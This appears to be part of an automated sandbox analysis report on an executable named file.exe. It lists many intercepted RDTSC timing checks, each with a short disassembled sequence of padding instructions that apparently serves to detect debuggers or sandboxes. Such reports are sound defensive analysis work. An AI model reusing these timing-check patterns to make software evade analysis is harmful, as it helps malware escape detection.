          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C49 second address: A05C5F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F1FDD1C1206h 0x00000010 jng 00007F1FDD1C1206h 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C5F second address: A05C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0580B second address: A05812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05812 second address: A05818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05818 second address: A05824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05824 second address: A05828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0A136 second address: A0A13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0A13A second address: A0A167 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1FDD1C1449h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F1FDD1C1441h 0x0000000f pushad 0x00000010 jmp 00007F1FDD1C143Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E4F0 second address: A0E4F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DF29 second address: A0DF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A140B3 second address: A140B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A140B7 second address: A140BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A140BD second address: A140C7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1FDD1C120Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A140C7 second address: A1410D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C143Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F1FDD1C1443h 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F1FDD1C1436h 0x00000019 jmp 00007F1FDD1C1447h 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1289F second address: A128B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1FDD1C120Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A128B4 second address: A128B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A128B8 second address: A128BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A128BC second address: A128C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A128C2 second address: A128C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A128C9 second address: A128D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1FDD1C1436h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12A21 second address: A12A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F1FDD1C1206h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12E74 second address: A12E91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12E91 second address: A12EBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1210h 0x00000007 jo 00007F1FDD1C1206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F1FDD1C120Dh 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13040 second address: A13046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13046 second address: A1304A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1304A second address: A1305A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F1FDD1C143Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4683 second address: 9B46B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jbe 00007F1FDD1C121Dh 0x00000012 jmp 00007F1FDD1C1217h 0x00000017 push eax 0x00000018 push edx 0x00000019 jnl 00007F1FDD1C1206h 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B46B9 second address: 9B46BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13207 second address: A1320B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1320B second address: A13233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F1FDD1C144Dh 0x0000000e jmp 00007F1FDD1C1447h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A13D8E second address: A13DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F1FDD1C1218h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A197F3 second address: A197F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A197F7 second address: A19815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Bh 0x00000007 jmp 00007F1FDD1C120Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19815 second address: A19821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F1FDD1C1436h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19821 second address: A1982B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1FDD1C1206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A19AF3 second address: A19B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Bh 0x00000007 push ecx 0x00000008 jmp 00007F1FDD1C143Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A345 second address: A1A349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A5EB second address: A1A5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A8A7 second address: A1A8AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A8AB second address: A1A8B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A8B3 second address: A1A8B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A8B9 second address: A1A8BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AB85 second address: A1ABA7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1FDD1C1206h 0x00000008 jmp 00007F1FDD1C1218h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1ABA7 second address: A1ABB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F1FDD1C1436h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1ABB1 second address: A1ABD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1218h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AE92 second address: A1AE96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AE96 second address: A1AE9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AE9C second address: A1AEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B107 second address: A1B10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B10B second address: A1B10F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B10F second address: A1B11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1FDD1C1206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B11F second address: A1B123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B123 second address: A1B155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1212h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1FDD1C1211h 0x0000000e popad 0x0000000f pushad 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F3E3 second address: A1F3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F3EB second address: A1F3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F3EF second address: A1F3F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F3F3 second address: A1F3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F566 second address: A1F56C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F56C second address: A1F570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F96B second address: A1F9B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1FDD1C1449h 0x0000000b je 00007F1FDD1C144Ah 0x00000011 jmp 00007F1FDD1C143Eh 0x00000016 jno 00007F1FDD1C1436h 0x0000001c popad 0x0000001d push ebx 0x0000001e jo 00007F1FDD1C143Eh 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D9D1 second address: A2D9DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F1FDD1C1206h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D9DB second address: A2DA12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F1FDD1C1447h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A46D second address: 96A471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A471 second address: 96A49C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1442h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F1FDD1C143Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A49C second address: 96A4E3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1FDD1C1206h 0x00000008 jns 00007F1FDD1C1206h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F1FDD1C1211h 0x00000017 jmp 00007F1FDD1C120Dh 0x0000001c pushad 0x0000001d jmp 00007F1FDD1C1214h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A4E3 second address: 96A4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C143Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BA5C second address: A2BA94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F1FDD1C1206h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F1FDD1C1219h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BA94 second address: A2BA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BA98 second address: A2BAA8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1FDD1C1206h 0x00000008 jns 00007F1FDD1C1206h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BAA8 second address: A2BAC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1FDD1C1446h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BEAA second address: A2BEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BEAE second address: A2BEC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F1FDD1C1436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F1FDD1C1436h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C17A second address: A2C180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C180 second address: A2C184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C184 second address: A2C188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C45A second address: A2C45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C45E second address: A2C462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C462 second address: A2C46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C46E second address: A2C472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C472 second address: A2C48C instructions: 0x00000000 rdtsc 0x00000002 je 00007F1FDD1C1436h 0x00000008 jmp 00007F1FDD1C143Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C48C second address: A2C4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C1215h 0x00000009 pop ebx 0x0000000a popad 0x0000000b jg 00007F1FDD1C123Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1FDD1C1219h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C899 second address: A2C89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C89F second address: A2C8BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C8BF second address: A2C8C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B585 second address: A2B58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B58B second address: A2B590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2FF23 second address: A2FF29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2FF29 second address: A2FF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2FDA3 second address: A2FDC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1FDD1C1206h 0x0000000a popad 0x0000000b jmp 00007F1FDD1C120Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1FDD1C120Ah 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3639F second address: A363A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38FCB second address: A38FD1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3928D second address: A392A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1FDD1C143Ch 0x0000000c push edx 0x0000000d pop edx 0x0000000e jns 00007F1FDD1C1436h 0x00000014 popad 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A392A9 second address: A392B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A392B1 second address: A392B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A392B5 second address: A392C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F1FDD1C1212h 0x0000000c ja 00007F1FDD1C1206h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48337 second address: A4835C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1FDD1C1436h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F1FDD1C1445h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A5D2 second address: A4A5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C5EF second address: A4C5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C1B2 second address: A4C1B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C1B7 second address: A4C1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jng 00007F1FDD1C1436h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C1CC second address: A4C1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1FDD1C120Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C1E4 second address: A4C1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A59743 second address: A59747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
